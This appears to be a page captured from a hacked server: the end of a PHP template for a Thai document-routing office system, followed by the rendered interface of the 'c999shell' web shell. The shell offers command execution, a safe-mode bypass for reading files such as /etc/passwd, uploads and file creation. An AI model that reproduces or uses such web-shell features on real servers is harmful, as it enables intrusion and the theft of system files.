								</tr>
								<? } ?>
								<? if($oRs6->AnID!=0 && $oRs6->AnID!=""){ 
								 		 $oAn->SearchByKey($oRs6->AnID);
										$oAn->GetRecord();
								 ?>
								 <tr><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ข้อมูลขึ้นเว็บ</td>
											<td><strong>:</strong></td>
											<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;&nbsp;<? echo $oAn->AnName; ?>
											<br>&nbsp;&nbsp;&nbsp;&nbsp;แจ้งขึ้นเว็บ&nbsp;<? echo ShowNameonweb($oDoc2->DocShowInOut); ?>
											<br>&nbsp;&nbsp;&nbsp;&nbsp;วันที่ประกาศขึ้นเว็บ&nbsp;
											<?  if($oRs6->DrsstartDatePost!="0000-00-00"){
														if($oRs6->DrsstartDatePost==$oRs6->DrsendDatePost){ 
															echo abbreDate2($oRs6->DrsstartDatePost,'/');
														}else{
															 echo  abbreDate2($oRs6->DrsstartDatePost,'/')."&nbsp;ถึง&nbsp;".abbreDate2($oRs6->DrsendDatePost,'/');
														}
													}
											?>
											</td>
								</tr>
								<? } ?>
								 <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
								 		<td width="0%"  align="center" ><strong>:</strong></td>
								        <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oRs6->DrsPropose); ?></td>
								 </tr>
								 <tr height=22>
									<td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้ส่งหนังสือ</td>
									<td width="0%"  align="center" ><strong>:</strong></td>
									<td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>" align="center">
									<? $oPS->SearchByKey($oRs6->DrsPsIDCreate); $oPS->GetRecord();   ?>
									  <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"; ?> 
									  <? 	
									  			$oDlc5->SearchByKey($oRs6->DrsDlcIDCreate);  $oDlc5->GetRecord();	
									  			$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();
												echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")&nbsp;";   
												 $oRs8->SearchByKey($oRs6->DrsFromDrsID);
												$oRs8->GetRecord();
												list($DocD,$DocT) = split(' ',$oRs8->DrsSendDate);
												echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
												?>
									</td>
								  </tr>
								  <?  //$oDoc3->SearchByKey($oRs6->DocID); $oDoc3->GetRecord(); 
								  			if($oRs6->DrsDocDueDate!="0000-00-00"){  ?>
											<tr><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;กำหนดระยะเวลาดำเนินการ</td>
											<td><strong>:</strong></td>
											<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;&nbsp;ภายในวันที่&nbsp;<? echo abbreDate2($oRs6->DrsDocDueDate,'/');?></td></tr>
								<? } ?>
								<tr>
							  <td colspan=3><hr color="#C87904"></hr></td>
							  </tr>
								 </table>
								 <?  } //show status=3 send to person?>
						  <?		// }
					    }	//each lineDoc  ?>
				 <? if($checkshow==1){ ?></div><? } ?> </td>
                </tr>
				<tr><td>&nbsp;</td></tr>
              </table>
	  </td></tr></table>
	 <?  } //DlcView   
		//	} //show RsID==3 ?>
	 
	  </form>  
</fieldset>  <table width="95%" border="0" align="center">
        <tr> 
          <td width="76" align="left"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">&nbsp;<strong>หมายเหตุ 
            : </strong>&nbsp;</font></td>
          <td width="618" align="left"><img src="../picture/allregistered_ico.gif" alt=""  border="0" > 
            <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">คลิกเพื่อเปิดดูแฟ้มหนังสือ </font></td>
        </tr>
			<tr> 
          <td width="76">&nbsp;</td>
          <td width="618" align="left">
            <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">&nbsp; </font></td>
        </tr></table>

</td>
</tr>
</table>
</body>
</html>
<? }else{ include_once "unselectposition.php"; } ?>
<script language="javascript">
function checkFormat(p,q){
		if(p=="1" || q=="1"){
			window.alert("ไม่สามารถเสนอลงนามได้ กรุณาติดต่อผู้รับผิดชอบระบบ");
			return false ;
		}
		var agree=confirm("คุณต้องการเสนอลงนามหนังสือแน่นอนใช่หรือไม่ ?");
		if (agree){
			document.ff.method.value="addpropose";
			return true;
		}else{
			return false ;
		}
}
function checkFormat2(p,q,r,s){
		var agree=confirm("คุณต้องการส่งผ่านแน่นอนใช่หรือไม่ ?");
		if (agree){
			document.ff.method.value="addByPass";
			return true;
		}else{
			return false ;
		}
}
function addSupplementMsg(p,q){ 
 			FileName = "addSupplementMsgTable.php?DLCID="+p+"&DlcPS2="+q;
			var w=350;  
			var h=300;
			strOption = "scrollbars=yes,left=400,top=100,width=" + w + ",height=" + h;
			window.open(FileName,"",strOption);
}
 function showline(p){ 
 			FileName = "showlinedocTable.php?searchDoc="+p;
			var w=900;  
			var h=500;
			strOption = "scrollbars=yes,left=370,top=100,menubar=1,width=" + w + ",height=" + h;
			window.open(FileName,"",strOption);
}
 function showline2(p){ 
 			FileName = "showlinedocTable2.php?searchDoc="+p;
			var w=900;  
			var h=500;
			strOption = "scrollbars=yes,left=370,top=100,menubar=1,width=" + w + ",height=" + h;
			window.open(FileName,"",strOption);
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--